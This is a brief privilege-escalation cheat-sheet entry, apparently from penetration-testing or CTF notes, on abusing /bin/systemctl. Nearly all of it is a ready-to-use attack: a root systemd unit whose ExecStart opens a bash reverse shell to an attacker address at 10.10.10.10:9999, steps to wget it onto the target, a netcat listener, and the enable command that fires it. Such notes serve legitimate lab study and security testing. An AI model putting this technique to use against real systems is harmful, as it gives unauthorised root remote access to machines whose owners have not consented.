# /bin/systemctl

\#Craft a payload and serve in /tmp (kali:10.10.10.10) , call it root.service 

```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

\#wget the file into any writable directory on target 

\#Setup a listener on kali, port quad9

```
nc -nvlp 9999
```

\#Trigger reverse shell with :

```
/bin/systemctl enable /tmp/root.service
```